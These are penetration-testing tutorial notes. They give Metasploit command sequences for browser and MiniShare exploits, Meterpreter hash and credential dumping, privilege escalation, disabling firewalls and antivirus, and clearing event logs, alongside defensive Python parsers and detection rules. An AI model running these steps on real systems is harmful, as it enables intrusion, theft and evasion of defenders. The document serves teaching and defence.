Nessus Basics
Nessus is a proprietary vulnerability scanner
It detects
> vulnerabilities
> misconfigurations
> default credentials on the target system
> it is also used in various compliance audits
===================
Learn how to use Meterpreter in Metasploit => Meterpreter Basics
Metasploit Basics => Metasploit Basics
======================================================
To open Nessus from Metasploit
msfconsole -> type load nessus -> nessus_help
Connect to Nessus running on our localhost in order to start the scans
syntax
nessus_connect <your username>:<your password>@localhost:8834 ok
Example
nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default port; the trailing ok acknowledges the plugin's warning that it does not verify the Nessus server's SSL certificate (the credentials could be captured by a man in the middle), so only connect like this over a trusted network
Check the Nessus scanning policies
Syntax
nessus_policy_list
Four built-in policies of Nessus
1) External network scan -> used for scanning network vulnerabilities from outside the perimeter
2) Internal network scan -> used for scanning network vulnerabilities from inside the network
3) Web App Tests -> used for scanning web applications for vulnerabilities
4) PCI-DSS (Payment Card Industry Data Security Standard) audits -> used for payment card industry compliance audits
Scanning the victim machine
> we have to create a new scan
syntax
nessus_scan_new <policy ID> <scan name> <target IP>
example
nessus_scan_new -2 windowsscan 192.168.3.2
(the built-in policies have negative IDs and user-created ones positive IDs; take the ID from the nessus_policy_list output)
> checking the status
nessus_scan_status
> checking the report list
nessus_report_list
> opening the report
nessus_report_hosts <report ID>
example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> the Severity column is the total number of findings for the host; the Sev 0 to Sev 3 columns break that total down by level
Classification of the different vulnerabilities (Nessus numbers severity upward, so the levels are)
> Sev 0 indicates informational findings
> Sev 1 indicates low severity vulnerabilities
> Sev 2 indicates medium severity vulnerabilities
> Sev 3 indicates high severity vulnerabilities (newer Nessus versions add Sev 4 for critical)
Command to see all the ports and their findings on one host
nessus_report_host_ports <target IP> <report ID>
example : nessus_report_host_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9
Report Importing In Metasploit
> Importing an Nmap report via msfconsole into the PostgreSQL database
scan the host with nmap and save the report in XML format (the -oX output option)
>> Check the database connectivity with the msfconsole
syntax : db_status
> import the Nmap report
syntax: db_import <path to the report file>
example: db_import /root/Desktop/scan.xml
>> see the host details
syntax: hosts <ip or hostname on which the nmap scan was performed>
Example: hosts 192.168.11.23
you will get to know the OS and MAC address
>> check the open ports and the services running on those ports
syntax: services <ip or hostname>
example: services 192.168.0.102
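A worked example, added here and not part of the original notes or of Metasploit itself: a small Python parser for the same nmap -oX XML that db_import consumes, producing the host and open-service view that the hosts and services commands print. The XML below is a constructed sample standing in for /root/Desktop/scan.xml; its addresses, MAC, hostname and product strings are made up.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output (no real host); it stands in for /root/Desktop/scan.xml.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.168.11.23">
<host>
 <status state="up"/>
 <address addr="192.168.11.23" addrtype="ipv4"/>
 <address addr="00:0C:29:3A:7B:11" addrtype="mac"/>
 <hostnames><hostname name="win-target" type="PTR"/></hostnames>
 <ports>
  <port protocol="tcp" portid="80"><state state="open"/>
   <service name="http" product="MiniShare httpd" version="1.4.1"/></port>
  <port protocol="tcp" portid="135"><state state="open"/>
   <service name="msrpc" product="Microsoft Windows RPC"/></port>
  <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
  <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
 </ports>
 <os><osmatch name="Microsoft Windows XP SP2" accuracy="97"/></os>
</host>
<host>
 <status state="down"/>
 <address addr="192.168.11.24" addrtype="ipv4"/>
</host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one record per live host: address, MAC, hostname, OS guess and ports."""
    hosts = []
    for h in ET.fromstring(xml_text).findall("host"):
        status = h.find("status")
        if status is not None and status.get("state") != "up":
            continue  # the msf 'hosts' view only cares about hosts that answered
        rec = {"address": None, "mac": None, "hostname": None, "os": None, "services": []}
        for a in h.findall("address"):
            if a.get("addrtype") in ("ipv4", "ipv6"):
                rec["address"] = a.get("addr")
            elif a.get("addrtype") == "mac":
                rec["mac"] = a.get("addr")
        hn = h.find("hostnames/hostname")
        if hn is not None:
            rec["hostname"] = hn.get("name")
        osm = h.find("os/osmatch")  # first (best) OS match, like the msf os_name column
        if osm is not None:
            rec["os"] = osm.get("name")
        for p in h.findall("ports/port"):
            state = p.find("state")
            svc = p.find("service")
            info = ""
            if svc is not None:
                info = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            rec["services"].append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name") if svc is not None else None,
                "info": info,
            })
        hosts.append(rec)
    return hosts


def open_services(hosts, address=None):
    """Rows (address, port, proto, name, info) for open ports, like 'services <ip>' in msfconsole."""
    rows = []
    for h in hosts:
        if address and h["address"] != address:
            continue
        for s in h["services"]:
            if s["state"] == "open":
                rows.append((h["address"], s["port"], s["proto"], s["name"], s["info"]))
    return sorted(rows)


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in parsed:
        print("%-15s %-18s %-12s %s" % (h["address"], h["mac"], h["hostname"], h["os"]))
    for row in open_services(parsed):
        print("%-15s %5d/%s %-14s %s" % row)
```

Closed ports are kept in the host record but filtered out of the services view, which is the same distinction the database makes between what was scanned and what is actually listening.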
> Importing the Nessus report into msfconsole
syntax: db_import <path to the .nessus file>
example: db_import /root/Desktop/Nessus_scan.nessus
> check the vulnerabilities
syntax: vulns <ip or hostname>
example: vulns 192.168.22.16
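A second added example, again not from the original notes or from Nessus or Metasploit: a parser for the .nessus (NessusClientData_v2) format that db_import reads, which also reproduces the per-level counts behind the Sev 0 to Sev 3 columns of nessus_report_hosts and the per-host port listing of nessus_report_host_ports. The document below is constructed; the host, the plugin IDs in the 900000 range and the plugin names are made up and do not correspond to real Nessus plugins. The severity scale (0 Info through 4 Critical) is Nessus's own.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Nessus's own scale; the plugin's "Sev 0".."Sev 3" columns count findings at each level.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed NessusClientData_v2 document standing in for /root/Desktop/Nessus_scan.nessus.
# Plugin IDs and names are made up; they are not real Nessus plugins.
SAMPLE_NESSUS_XML = """<NessusClientData_v2>
<Policy><policyName>Internal Network Scan</policyName></Policy>
<Report name="windowsscan">
 <ReportHost name="192.168.11.164">
  <HostProperties>
   <tag name="host-ip">192.168.11.164</tag>
   <tag name="operating-system">Microsoft Windows XP Service Pack 2</tag>
  </HostProperties>
  <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
              pluginID="900001" pluginName="Constructed high: SMB remote code execution"/>
  <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
              pluginID="900002" pluginName="Constructed medium: SMB signing not required"/>
  <ReportItem port="135" svc_name="epmap" protocol="tcp" severity="1"
              pluginID="900003" pluginName="Constructed low: DCE endpoint enumeration"/>
  <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0"
              pluginID="900004" pluginName="Constructed info: SMB service detection"/>
  <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
              pluginID="900005" pluginName="Constructed info: OS identification"/>
 </ReportHost>
</Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """One finding per ReportItem: host, port, protocol, service, severity, plugin id and name."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        for item in host.findall("ReportItem"):
            findings.append({
                "host": props.get("host-ip", host.get("name")),
                "os": props.get("operating-system", ""),
                "port": int(item.get("port")),
                "proto": item.get("protocol"),
                "svc": item.get("svc_name"),
                "severity": int(item.get("severity")),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName"),
            })
    return findings


def severity_counts(findings):
    """host -> {severity: count}; the Sev 0..Sev 3 columns of nessus_report_hosts."""
    counts = defaultdict(lambda: defaultdict(int))
    for f in findings:
        counts[f["host"]][f["severity"]] += 1
    return {h: dict(c) for h, c in counts.items()}


def host_ports(findings, host, min_severity=0):
    """(port, proto, svc) for a host, like nessus_report_host_ports; port 0 is the general host entry."""
    ports = {(f["port"], f["proto"], f["svc"]) for f in findings
             if f["host"] == host and f["severity"] >= min_severity and f["port"] != 0}
    return sorted(ports)


def worst_first(findings):
    """Findings ordered highest severity first: the triage order, not the numeric order."""
    return sorted(findings, key=lambda f: (-f["severity"], f["host"], f["port"]))


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS_XML)
    for host, counts in severity_counts(found).items():
        print(host, {SEVERITY_NAMES[s]: n for s, n in sorted(counts.items())})
    for f in worst_first(found):
        print(SEVERITY_NAMES[f["severity"]], f["host"], "%d/%s" % (f["port"], f["proto"]), f["plugin_name"])
```

The min_severity filter on host_ports is the practical check a tester wants after a scan: which ports carry a high finding, rather than every port the scanner touched.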
Client Side Exploitation
What are Client Side Attacks ?
> The server is the main computer that shares its resources over the network, and the clients are the other computers on the network that use these resources
> There is a large array of attacks that may be launched against the clients
such as
> browser-based attacks
> vulnerable service exploitation
> a client OS has multiple applications such as a PDF reader, document reader and instant messenger, and each of them is an attack surface
> The malicious code may exploit any form of ActiveX, Java and Flash content in the browser
Exploits of the victim's browser
> browser autopwn
msfconsole -> use auxiliary/server/browser_autopwn -> show options -> set LHOST 192.168.2.23 (required: the address the payloads connect back to) -> set SRVHOST 192.168.3.22 (SRVHOST is the local address the malicious web server listens on) -> set SRVPORT 80 (SRVPORT is the local listening port) -> run
after typing run it starts the exploit modules on the localhost and prints the malicious URL, which must be delivered to the victim and clicked
-> to check the meterpreter session that was created type in "sessions"
(getting into the computer and creating a session)
-> sessions (shows the ID) -> sessions -i <id> -> sysinfo
> Internet Explorer Shortcut Icon Exploit (MS10-046)
shortcut (.lnk) files whose icon handling loads a malicious DLL
msfconsole -> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1
> Internet Explorer malicious VBScript code execution exploit (MS10-022)
msfconsole -> use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
the page shows a message box; once the victim presses F1 the malicious VBScript launches winhlp32 and the payload runs (calc.exe in the test run) -> sessions -> sessions -i 1
Post Exploitation
Post exploitation basically means the phases of operation once a victim's system has been compromised by the attacker. The value of the compromised system is determined by the value of the actual data stored on it and how an attacker may make use of it for malicious purposes.
The concept of post exploitation has risen from this fact only: how you can use the compromised system's information, document it, and get an idea of its configuration and communication channels.
Phases of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdoors and rootkits
> Pivoting to penetrate internal networks
Let's start the first phase of post exploitation by gathering as much information as possible
Type in (at the Meterpreter prompt; the "run" commands call legacy Meterpreter scripts, most of which now have post/ module equivalents) :
sysinfo (get system info)
getpid (get the process ID Meterpreter is running in)
ps (get the process list)
run checkvm (check whether the victim's system is a virtual machine or not)
idletime (check how long the user has been idle, i.e. whether the victim is active or not)
run get_env (dump the victim's environment variables with another meterpreter script)
ipconfig (check the victim's system IP address)
route (see the routing table)
run getcountermeasure (map the security configuration of the victim's system: firewall, antivirus and similar)
run getgui (enable the victim's Remote Desktop Protocol service)
run getgui -e
run gettelnet (enable the telnet service)
run gettelnet -e
run get_local_subnets (see the victim's local subnets)
run hostedit (allows an attacker to add entries to the Windows hosts file; the entry format is IP,hostname)
run hostedit -e 127.0.0.1,www.apple.com
run enum_logged_on_users (how many users are currently logged in)
run enum_logged_on_users -c
run get_application_list (shows all the installed applications)
run post/windows/gather/forensics/enum_drives (enumerate the physical drives)
run post/windows/gather/enum_ms_product_keys (get the OS product key)
run post/windows/gather/credentials/windows_autologin (check the autologin feature for stored credentials)
run winenum (dump juicy information such as hashes and tokens into a log directory named after the hostname and timestamp)
cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> ls
cat hashdump.txt
run scraper
cd .msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt
Post Exploitation Privilege Escalation
> Privilege escalation is the second of the post exploitation phases listed above
Understanding Privilege Escalation
Privilege escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users.
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information
Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation
Vertical Privilege Escalation
a lower privileged user or application gains access to functions that are reserved only for authorized or administrative users. This is also known as privilege elevation.
Horizontal Privilege Escalation
This escalation happens on a horizontal scale with respect to user rights: a normal user accesses resources reserved for another user at the same privilege level.
Exploiting the victim's system
> we use a piece of software called MiniShare (free file sharing software with a known buffer overflow in its HTTP GET handling)
Commands
open msfconsole -> use exploit/windows/http/minishare_get_overflow -> show options -> set RHOST 192.168.11.203 (victim IP) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the target OS version from the list) -> exploit ->
(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 (try every escalation technique) -> ps
Privilege escalation by post exploitation modules
This module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.
(Meterpreter) run post/windows/escalate/getsystem
run post/windows/escalate/service_permissions
(This module exploits the existing administrative privileges to obtain a SYSTEM session. If that fails in the first instance, the module inspects the existing services and looks for insecure file or configuration permissions that allow a service binary to be replaced, then restarts the service to run the payload.)
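A worked example of the check that service_permissions automates, added here as example code rather than the module's own: given the BINARY_PATH_NAME that sc qc prints for a service and the ACEs that icacls prints for the service binary, flag binaries writable by low-privileged principals and unquoted paths containing spaces. The service names, paths and ACEs below are constructed; the parsing follows the icacls output format (principal:(inheritance flags)(rights)), and the list of low-privileged principals is an assumption for the example.

```python
import re

# icacls flags that describe inheritance rather than rights
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# simple rights and specific rights that let the holder modify or replace the file
WRITE_SIMPLE = {"F", "M", "W"}
WRITE_SPECIFIC = {"WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
# principals that any local user (including a low-privileged Meterpreter session) belongs to
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive", "users"}

# Constructed records mirroring `sc qc <svc>` (BINARY_PATH_NAME) and the ACEs of `icacls <exe>`.
SAMPLE_SERVICES = {
    "GoodSvc": {
        "binary_path": '"C:\\Program Files\\Good Vendor\\goodsvc.exe" -run',
        "icacls": ["NT AUTHORITY\\SYSTEM:(I)(F)", "BUILTIN\\Administrators:(I)(F)",
                   "BUILTIN\\Users:(I)(RX)"],
    },
    "WeakSvc": {
        "binary_path": "C:\\Program Files\\Weak Vendor\\weak service.exe /service",
        "icacls": ["NT AUTHORITY\\SYSTEM:(I)(F)", "BUILTIN\\Users:(I)(M)", "Everyone:(I)(RX)"],
    },
    "WorldWritable": {
        "binary_path": "C:\\svc\\wwsvc.exe",
        "icacls": ["Everyone:(F)", "NT AUTHORITY\\Authenticated Users:(OI)(CI)(RX,W)"],
    },
}


def parse_ace(ace):
    """'BUILTIN\\Users:(I)(RX,W)' -> ('BUILTIN\\Users', {'RX', 'W'}); inheritance flags are dropped."""
    principal, _, rest = ace.partition(":")
    rights = set()
    for group in re.findall(r"\(([^)]*)\)", rest):
        for tok in group.split(","):
            tok = tok.strip()
            if tok and tok not in INHERIT_FLAGS:
                rights.add(tok)
    return principal.strip(), rights


def grants_write(rights):
    return bool(rights & WRITE_SIMPLE) or bool(rights & WRITE_SPECIFIC)


def service_exe_path(binary_path):
    """Extract the executable from BINARY_PATH_NAME; the second value says whether it was quoted."""
    bp = binary_path.strip()
    if bp.startswith('"'):
        return bp[1:bp.index('"', 1)], True
    m = re.match(r"(.*?\.exe)", bp, re.IGNORECASE)
    return (m.group(1) if m else bp.split()[0]), False


def audit_service(rec):
    issues = []
    path, quoted = service_exe_path(rec["binary_path"])
    if not quoted and " " in path:
        # Windows tries C:\Program.exe, C:\Program Files\Weak.exe, ... before the real binary
        issues.append("unquoted service path with spaces: %s" % path)
    for ace in rec["icacls"]:
        principal, rights = parse_ace(ace)
        if principal.lower() in LOW_PRIV and grants_write(rights):
            issues.append("%s writable by %s (%s)" % (path, principal, ",".join(sorted(rights))))
    return issues


def audit_services(services):
    """service name -> list of issue strings (an empty list means nothing was found)."""
    return {name: audit_service(rec) for name, rec in services.items()}


if __name__ == "__main__":
    for name, issues in audit_services(SAMPLE_SERVICES).items():
        print(name, "->", issues or "ok")
```

Either finding is enough for the escalation the module performs: a writable binary is swapped for the payload, and an unquoted path with spaces lets a file dropped at C:\Program.exe (if the directory is writable) run as the service account on the next restart.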
Different exploit for compromising the target system
msf> use exploit/windows/browser/ms10_002_aurora -> show options -> set SRVHOST 192.168.0.109 (the attacker's listening address, not the victim's) -> exploit -> send the URL to the victim -> sessions -> sessions -i 1
Post Exploitation Cleaning Up Traces
Cleaning tracks and traces through log deletion and staying undetected by disabling the firewall and antivirus systems
Why is a firewall important ?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.
Firewalls are classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall
Packet Filter Firewall
These firewalls work on the first three layers of the OSI model, with a little help from the transport layer as well for the source and destination port numbers. When a packet arrives at the packet filter firewall, it is checked against a set of rules, and each packet is judged on its own without reference to earlier packets.
Stateful Firewall
These are also called second-generation firewalls. They track the state of each network connection and use that state, not just the individual packet, to decide whether to allow the packet into the network or not.
Application Firewall
These are known as third-generation firewalls. Application firewalls understand application protocols like HTTP, SMTP and SSH. They also help in detecting whether an unwanted protocol is trying to bypass the firewall on an allowed port.
commands
run getcountermeasure
(reports the firewall's operational mode, e.g. "operational mode = Enable")
-> shell -> netsh firewall show opmode
see if the firewall is enabled or not
-> shell -> netsh firewall set opmode mode=disable
(the netsh firewall context is the legacy Windows XP/2003 interface; on Vista and later the equivalent settings live under the netsh advfirewall context)
Disabling firewalls through VBScript
Code
' Uses the legacy Windows Firewall COM API (HNetCfg.FwMgr); needs administrative rights on the target
Set objFirewall = CreateObject("HNetCfg.FwMgr")
' CurrentProfile is whichever profile (domain or standard) is active right now
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
save the code with a .vbs extension, then upload it from Meterpreter
syntax: upload <source filepath> <destination filepath>
Example: upload /root/Desktop/disable.vbs C:\\
(backslashes are doubled in Meterpreter paths) then go to the destination on the target and execute the script with cscript
Antivirus Killing and Log Deletion
killing the processes of an antivirus with the help of the post exploitation Meterpreter script known as killav
Script of killav.rb
/opt/framework/msf3/scripts/meterpreter/killav.rb
killav only kills processes whose names are in the list inside killav.rb, so the antivirus's process name must be present there for it to be stopped
(Meterpreter) run killav -> shell -> tasklist (to see the running processes) or tasklist /svc or tasklist /svc | find /I "avg"
> to see the properties of the service behind a process
sc queryex avgwd -> sc config <service name> start= disabled (disables the service behind a process which cannot be killed; sc takes the service name, not the process name, and the space after start= is required)
Terminating a process
taskkill /F /IM "antivirus name*"
Clearing tracks to be SAFE
Clearing all the logs
(Meterpreter) clearev
(clearev wipes the Application, System and Security event logs; Windows records the clearing of the Security log as its own event after the wipe, so the wipe itself remains visible to a defender)
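Added here as the defender's counterpart to the commands above; this is example code and not part of the notes. It runs simple detection rules over constructed Windows events and then correlates a log wipe that follows firewall or antivirus tampering on the same host. The event IDs are the real ones (1102 and 104 for a cleared Security or System log, 7040 for a service start type change such as sc config start= disabled, 2003 for a firewall profile setting change, 4688 for process creation, which only carries the command line when command-line auditing is enabled); the hostnames, user names, times and the flattened field layout are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Constructed Windows events in a flattened shape (as an EVTX-to-JSON forwarder might emit).
# Event IDs are the real Windows ones; hosts, users and times are made up.
SAMPLE_EVENTS = [
    {"time": "2013-09-27T22:10:05", "computer": "WIN-TARGET", "channel": "Security",
     "provider": "Microsoft-Windows-Security-Auditing", "event_id": 4688,
     "data": {"SubjectUserName": "bob", "NewProcessName": "C:\\Windows\\System32\\netsh.exe",
              "CommandLine": "netsh firewall set opmode mode=disable"}},
    {"time": "2013-09-27T22:10:06", "computer": "WIN-TARGET",
     "channel": "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
     "provider": "Microsoft-Windows-Windows Firewall With Advanced Security", "event_id": 2003,
     "data": {"Profile": "Domain", "SettingType": "Enable Windows Firewall", "SettingValue": "No"}},
    {"time": "2013-09-27T22:11:40", "computer": "WIN-TARGET", "channel": "System",
     "provider": "Service Control Manager", "event_id": 7040,
     "data": {"param1": "AVG WatchDog", "param2": "auto start", "param3": "disabled"}},
    {"time": "2013-09-27T22:12:02", "computer": "WIN-TARGET", "channel": "Security",
     "provider": "Microsoft-Windows-Security-Auditing", "event_id": 4688,
     "data": {"SubjectUserName": "bob", "NewProcessName": "C:\\Windows\\System32\\taskkill.exe",
              "CommandLine": "taskkill /F /IM avg*"}},
    {"time": "2013-09-27T22:31:15", "computer": "WIN-TARGET", "channel": "System",
     "provider": "Microsoft-Windows-Eventlog", "event_id": 104,
     "data": {"SubjectUserName": "bob", "Channel": "System"}},
    {"time": "2013-09-27T22:31:16", "computer": "WIN-TARGET", "channel": "Security",
     "provider": "Microsoft-Windows-Eventlog", "event_id": 1102,
     "data": {"SubjectUserName": "bob"}},
    # benign noise on another host: a service set to manual start, not disabled
    {"time": "2013-09-27T09:00:00", "computer": "FILESRV01", "channel": "System",
     "provider": "Service Control Manager", "event_id": 7040,
     "data": {"param1": "Windows Update", "param2": "auto start", "param3": "demand start"}},
]

# command-line fragments matching the tampering steps in the notes (4688 needs command-line auditing)
TAMPER_CMDS = ("netsh firewall set opmode", "netsh advfirewall set", "taskkill /f /im",
               "sc config", "wevtutil cl")


def classify(ev):
    """Return (rule, severity, detail) for one event, or None if it is not interesting."""
    eid, d = ev["event_id"], ev["data"]
    user = d.get("SubjectUserName", "?")
    if ev["provider"] == "Microsoft-Windows-Eventlog" and eid in (1102, 104):
        # clearev / wevtutil cl: the clearing is logged after the wipe, so this record survives it
        return "log_cleared", "high", "%s log cleared by %s" % (ev["channel"], user)
    if eid == 7040 and d.get("param3", "").lower() == "disabled":
        return "service_disabled", "medium", "%s start type changed to disabled" % d.get("param1")
    if eid == 2003 and d.get("SettingType") == "Enable Windows Firewall" and d.get("SettingValue") == "No":
        return "firewall_disabled", "high", "firewall turned off for the %s profile" % d.get("Profile")
    if eid == 4688:
        cmd = d.get("CommandLine", "").lower()
        if any(p in cmd for p in TAMPER_CMDS):
            return "tamper_command", "medium", "%s ran: %s" % (user, d.get("CommandLine"))
    return None


def detect(events):
    """Per-event alerts, oldest first."""
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        hit = classify(ev)
        if hit:
            rule, sev, detail = hit
            alerts.append({"time": datetime.fromisoformat(ev["time"]), "computer": ev["computer"],
                           "rule": rule, "severity": sev, "detail": detail})
    return alerts


def correlate(alerts, window=timedelta(hours=1)):
    """One critical alert per host where a log wipe follows firewall/AV tampering within the window."""
    chains = []
    for computer in sorted({a["computer"] for a in alerts}):
        mine = [a for a in alerts if a["computer"] == computer]
        tamper = [a for a in mine if a["rule"] != "log_cleared"]
        clears = [a for a in mine if a["rule"] == "log_cleared"]
        linked = [(t, c) for t in tamper for c in clears
                  if timedelta(0) <= c["time"] - t["time"] <= window]
        if linked:
            chains.append({"computer": computer, "severity": "critical", "rule": "tamper_then_clear",
                           "start": min(t["time"] for t, _ in linked),
                           "end": max(c["time"] for _, c in linked), "links": len(linked)})
    return chains


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(a["time"], a["computer"], a["severity"], a["rule"], a["detail"])
    for c in correlate(found):
        print("CHAIN", c["computer"], c["start"], "->", c["end"], c["links"], "links")
```

The correlation is what turns individually noisy signals (admins do disable services and change firewall profiles) into a high-confidence one: the sequence disable defences, then clear the logs, on one host within an hour, is the exact footprint of the procedure described in this section.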